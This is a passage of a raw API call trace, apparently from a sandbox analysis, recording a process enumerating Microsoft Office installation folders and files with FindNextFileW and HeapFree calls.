dwReserved1=0x2e0000, cFileName="loc", cAlternateFileName="")) returned 1 [0182.381] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0182.381] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mcxml", cAlternateFileName="")) returned 1 [0182.385] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.385] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0182.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.386] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0182.386] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.386] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 1 [0182.387] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.388] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 0 [0182.388] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0182.388] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43b3078 | out: hHeap=0x680000) returned 1 [0182.388] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x39df584 | out: lpFindFileData=0x39df584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3c29db74, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Office16", cAlternateFileName="")) returned 1 [0182.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0182.389] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a96a42, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a96a42, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xde78, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0182.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0182.391] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x45a7036, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x45a7036, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4619706, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DBSAMPLE.MDB", cAlternateFileName="")) returned 1 [0182.575] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0182.575] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBSPAPR", cAlternateFileName="")) returned 1 [0182.580] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0182.580] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc79af6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc79af6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7c11d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fc48, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="PUBWZINT.DLL", cAlternateFileName="")) returned 1 [0182.583] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43e5098 | out: hHeap=0x680000) returned 1 [0182.583] FindNextFileW (in: hFindFile=0x43a2898, lpFindFileData=0x39df08c | out: lpFindFileData=0x39df08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae70165, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae70165, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae70165, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42ca, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ReviewRouting_Init.xsn", cAlternateFileName="REVIEW~1.XSN")) returned 1 [0182.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.595] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0182.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.595] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0182.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.595] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x12985c4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AccessWeb", cAlternateFileName="ACCESS~1")) returned 1 [0182.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.596] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1295fc19, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1306082b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x393a40, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCICONS.EXE", cAlternateFileName="")) returned 1 [0182.597] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43d5090 | out: hHeap=0x680000) returned 1 [0182.597] FindNextFileW (in: hFindFile=0x43a2e98, lpFindFileData=0x39df308 | out: lpFindFileData=0x39df308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb6c7584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x33860, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="ACCWIZ.DLL", cAlternateFileName="")) returned 1 [0182.602] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.602] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf480feb5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x18157e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18157e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bg", cAlternateFileName="")) returned 1 [0182.604] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.604] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x61b241f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x61b241f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ca", cAlternateFileName="")) returned 1 [0182.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.606] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf134fca5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ee20e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ee20e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cs", cAlternateFileName="")) returned 1 [0182.609] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.609] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5c164a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6866e01, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6866e01, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="da", cAlternateFileName="")) returned 1 [0182.938] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.938] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x624ad43, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x624ad43, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="de", cAlternateFileName="")) returned 1 [0182.939] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.939] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf472b09c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf472b09c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf475131d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4fe050, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DocumentFormat.OpenXml.dll", cAlternateFileName="DOCUME~1.DLL")) returned 1 [0182.940] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.940] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf47e9c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="es", cAlternateFileName="")) returned 1 [0182.942] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.942] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0df27d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="et", cAlternateFileName="")) returned 1 [0182.943] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.943] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf41cdbc1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x69980f7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x69980f7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="eu", cAlternateFileName="")) returned 1 [0182.945] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.945] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56d17f1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56d17f1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56d17f1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="EventSource.dll", cAlternateFileName="EVENTS~1.DLL")) returned 1 [0182.946] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.946] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefd42039, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x60db08, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x60db08, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fr", cAlternateFileName="")) returned 1 [0182.947] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.947] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e0a643, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x675bda6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x675bda6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="gl", cAlternateFileName="")) returned 1 [0182.949] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.949] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c8cf9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="he", cAlternateFileName="")) returned 1 [0182.950] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.950] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf43e3cb7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6c93006, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6c93006, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hi", cAlternateFileName="")) returned 1 [0182.952] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.952] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ac3289, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6b61d36, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b61d36, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hr", cAlternateFileName="")) returned 1 [0182.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.953] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1945af2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x2ebbef3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2ebbef3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hu", cAlternateFileName="")) returned 1 [0182.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.955] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="id", cAlternateFileName="")) returned 1 [0182.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.956] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa89f599, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6270fd0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6270fd0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="it", cAlternateFileName="")) returned 1 [0182.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.957] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12dd5ae, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x91adba5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x91adba5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ja", cAlternateFileName="")) returned 1 [0182.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.959] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbd09866, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="kk", cAlternateFileName="")) returned 1 [0182.960] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.960] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ko", cAlternateFileName="")) returned 1 [0182.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.962] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lt", cAlternateFileName="")) returned 1 [0182.964] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.964] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lv", cAlternateFileName="")) returned 1 [0182.965] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44950d0 | out: hHeap=0x680000) returned 1 [0182.966] FindNextFileW (in: hFindFile=0x43a3018, lpFindFileData=0x39deb94 | out: lpFindFileData=0x39deb94*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, 